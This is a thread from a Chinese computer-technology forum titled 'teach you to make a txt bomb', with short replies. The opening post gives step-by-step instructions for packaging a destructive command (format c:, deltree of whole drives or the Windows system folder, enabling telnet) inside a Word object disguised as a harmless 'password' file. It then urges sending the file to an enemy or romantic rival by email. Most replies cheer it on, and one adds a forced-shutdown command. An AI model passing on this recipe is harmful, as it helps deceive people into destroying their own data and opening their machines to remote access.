计算机技术论坛

QQ登录

只需一步,快速开始

• 欢迎访问 计算机技术论坛-电脑迷与初学者的家园!由于论坛管理严格,新注册会员可能遇到各种问题,无法解决的请发邮件 admin@jsjbbs.cn

教你做个txt炸弹

1.创建一个只包含一个空格(为了减小文件体积,大家都知道)的文本文件,取名3jie。
    2.打开WORD文档,将此文件拖放入文档。也可以点击记文档菜单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件,点击“确定”,就OK了。。。
    3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”。
    在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。这里就给我们大家一个启示,例如我们编辑上面的命令替换为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件。这里我们可以得到启示,我们也可以编辑其他的命令如:@auto start telnet 就是打开对放的telnet服务。这里我就不演示了的,请多包涵。。。
    4.点击“插入图标”按钮,会弹出一个对话框,确认,然后任选一个图标。这里我们可以随便选的,
    5.选择菜单栏中的“编辑\标签”,为我们刚嵌入的对象改名(怎么看这办,不用我说吧)这里我们就假如用password吧。点击“文件”菜单中的“更新”,然后关闭此对话框。
    6.将刚刚建立的嵌入对象拖放到桌面上。
    看到了吧,就这么简单,不过你千万不要运行哦。要不损失不用我赔偿,你就慢慢的点吧,哈哈 ,不要看他小哦,要是你有个仇人或者给你情敌,用电子邮件当附件给他,或者来个更简单的,你就当一次人妖算了,把东西传给他,OK? 这也太毒了吧你 ,我可不是教你使坏啊。
写的不错,挺好的。就是会有人使坏的啊
会有人使坏的啊
应该不会场吧
这么厉害的东西。。
发给人家不被骂死咯
这个太坏了
我只想让人家电脑关机
这个怎么制作啦 呵呵
教教:lol
jiang_qinggen 该用户已被删除
强悍    大哥!!!!!!!!!
yangxi1215 该用户已被删除
我想试一下!
太狠了吧..让人家关机用shutdown -s -t 10 -c..
10秒自动关机..
呵呵,有意思,弄弄玩玩!